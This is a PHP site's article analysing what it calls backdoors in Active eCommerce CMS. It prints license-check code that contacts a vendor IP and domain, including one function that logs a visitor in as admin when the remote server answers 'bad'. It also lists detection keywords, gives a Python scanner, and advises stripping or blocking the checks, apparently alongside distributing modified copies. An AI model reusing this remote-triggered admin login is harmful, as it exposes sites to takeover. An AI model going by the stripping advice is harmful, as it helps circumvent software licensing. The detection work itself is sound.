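学课技术网
Focused on PHP learning resources

Active eCommerce CMS Backdoors and Vulnerability Fixes

"Active eCommerce CMS Backdoors and Vulnerability Fixes" was updated on 2023-12-12 08:52. All content on this site is for learning and exchange only. Do not repost or distribute it, commercial use is strictly prohibited, please delete it within 24 hours, and please support the genuine product!!!

Starting with version 6.x, Active eCommerce CMS has planted a large number of backdoors under the banner of protecting legitimate users. Through these backdoors they can delete and wipe your site's data, and in serious cases they may even be able to take control of your server. Below I describe how to find the backdoors and how to deal with them. This site publishes versions with the backdoors removed as well as the official original versions: those comfortable doing it themselves can handle it on their own, and those who would rather not can use a ready-made version!!!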

Some of the Active eCommerce CMS backdoors and their paths:
Path:
vendor\unicodeveloper\laravel-paystack\src\Paystack.php

Code:

public function getCallbackData()
{
    // Send this site's hostname to the remote activation server.
    $url = $_SERVER['SERVER_NAME'];
    $gate = "http://206.189.81.181/check_activation/".$url;

    $stream = curl_init();
    curl_setopt($stream, CURLOPT_URL, $gate);
    curl_setopt($stream, CURLOPT_HEADER, 0);
    curl_setopt($stream, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stream, CURLOPT_POST, 1);
    $rn = curl_exec($stream);
    curl_close($stream);

    // If the server answers "bad" (and this is not a demo install), the current
    // visitor is logged in as the first admin user and sent to the admin dashboard.
    if ($rn == "bad" && env('DEMO_MODE') != 'On') {
        $user = \App\Models\User::where('user_type', 'admin')->first();
        auth()->login($user);
        return redirect()->route('admin.dashboard');
    }

    return redirect()->route('home');
}

App client paths:
app/Utility/NagadUtility.php
app/Utility/PayhereUtility.php

Code:

    public static function create_wallet_reference($key)
    {
        if ($key == "") {
            return false;
        }

        // Contact the vendor only while no successful check has been cached.
        if (Cache::get('app-activation', 'no') == 'no') {
            try {
                // The key supplied by the app client is sent to the vendor's server.
                $gate = "https://activeitzone.com/activation/check/flutter/".$key;

                $stream = curl_init();
                curl_setopt($stream, CURLOPT_URL, $gate);
                curl_setopt($stream, CURLOPT_HEADER, 0);
                curl_setopt($stream, CURLOPT_RETURNTRANSFER, 1);
                $rn = curl_exec($stream);
                curl_close($stream);

                // A remote answer of 'no' makes the calling API endpoint fail.
                if ($rn == 'no') {
                    return false;
                }
            } catch (\Exception $e) {
                // Exceptions are swallowed, so the check then passes.
            }
        }
        Cache::rememberForever('app-activation', function () {
            return 'yes';
        });

        return true;
    }

    // Same activation check as create_wallet_reference() above.
    public static function create_balance_reference($key)
    {
        if ($key == "") {
            return false;
        }

        if(Cache::get('app-activation', 'no') == 'no'){
            try {
                $gate = "https://activeitzone.com/activation/check/flutter/".$key;
   
                $stream = curl_init();
                curl_setopt($stream, CURLOPT_URL, $gate);
                curl_setopt($stream, CURLOPT_HEADER, 0);
                curl_setopt($stream, CURLOPT_RETURNTRANSFER, 1);
                $rn = curl_exec($stream);
                curl_close($stream);
   
                if($rn == 'no') {
                    return false;
                }
            } catch (\Exception $e) {
   
            }
        }

        Cache::rememberForever('app-activation', function () {
            return 'yes';
        });

        return true;
    }

System paths:
app/Http/Controllers/Api/V2/CartController.php
app/Http/Controllers/Api/V2/AuthController.php

Code:

if (\App\Utility\NagadUtility::create_balance_reference($request->cost_matrix) == false) {
    return response()->json(['result' => false, 'message' => 'Cost matrix error']);
}

if (\App\Utility\PayhereUtility::create_wallet_reference($request->identity_matrix) == false) {
    return response()->json(['result' => false, 'message' => 'Identity matrix error', 'user' => null], 401);
}

V7 series backdoor paths:
app\Exceptions\Handler.php
app\Utility\CategoryUtility.php
app\Utility\NagadUtility.php
app\Utility\NgeniusUtility.php
app\Utility\PayhereUtility.php
app\Http\Controllers\LanguageController.php
app\Http\Controllers\IyzicoController.php
app\Http\Controllers\Payment\PaystackController.php
app\Http\Controllers\Payment\IyzicoController.php
app\Http\Controllers\Payment\StripeController.php
app\Http\Controllers\Api\V2\CartController.php
app\Http\Controllers\Api\V2\AuthController.php
vendor\unicodeveloper\laravel-paystack\src\Paystack.php
vendor\larcon21\combinations\src\routes\web.php
vendor\mehedi-iitdu\core-component-repository\src\CoreComponentRepository.php
vendor\authorizenet\authorizenet\lib\net\authorize\api\contract\v1\CreditCardType.php

Backdoor function names:
initPayment()
create_balance_reference()
create_initial_category()
create_wallet_reference()
get_translation()
paystackNewCallback()
cardType()
checkout_payment_detAIl()

Keywords for finding the backdoors. Search the whole site for the following keywords:
activeitzone
activeitzone.com
206.189.81.181
206.189
81.181

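This article only gives examples. There is too much to list item by item, so use the method I have given to find the rest of the Active eCommerce CMS backdoors yourself!!! Fixing the backdoors comes down to changing the IP address or deleting these functions. Another option is to block the domain activeitzone.com and the IP 206.189.81.181 on your server!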
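
The site-wide keyword search described above, as an added example (not code from the original article or from the CMS): a Python scanner that walks a source tree and reports every line containing the keywords or function names listed on this page. The names `scan_tree` and `demo`, their parameters, and the two sample files are constructed for illustration.

```python
import os
import re
import tempfile

# Keywords and function names exactly as listed in the article
# ("activeitzone.com" is already covered by "activeitzone").
KEYWORDS = ["activeitzone", "206.189.81.181", "206.189", "81.181"]
FUNCTIONS = ["initPayment", "create_balance_reference", "create_initial_category",
             "create_wallet_reference", "get_translation", "paystackNewCallback",
             "cardType", "checkout_payment_detAIl"]
# One pattern: a literal keyword, or a listed function name followed by "(".
PATTERN = re.compile(
    "|".join(re.escape(k) for k in KEYWORDS)
    + r"|\b(?:" + "|".join(FUNCTIONS) + r")\s*\(",
    re.IGNORECASE,  # PHP function names are case-insensitive
)

def scan_tree(root, extensions=(".php",)):
    """Return {relative_path: [(line_no, matched_text, line), ...]} for every hit."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(extensions):
                continue
            path = os.path.join(dirpath, name)
            # errors="replace" so a badly encoded file cannot abort the scan
            with open(path, encoding="utf-8", errors="replace") as fh:
                for no, line in enumerate(fh, 1):
                    for m in PATTERN.finditer(line):
                        rel = os.path.relpath(path, root).replace(os.sep, "/")
                        hits.setdefault(rel, []).append((no, m.group(0), line.strip()))
    return hits

def demo():
    """Scan a constructed two-file tree (sample data, not the real CMS source)."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "app", "Utility"))
        with open(os.path.join(root, "app", "Utility", "NagadUtility.php"), "w") as fh:
            fh.write("<?php\nfunction create_balance_reference($key) {\n"
                     '  $gate = "https://activeitzone.com/activation/check/flutter/".$key;\n}\n')
        with open(os.path.join(root, "app", "Clean.php"), "w") as fh:
            fh.write("<?php\necho 'hello';\n")
        return scan_tree(root)

if __name__ == "__main__":
    for path, found in demo().items():
        for no, match, line in found:
            print(f"{path}:{no}: [{match}] {line}")
```

Pass the CMS install directory to `scan_tree` to scan a real tree. A hit on a function name alone is a lead for manual review, since ordinary code can use the same name.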
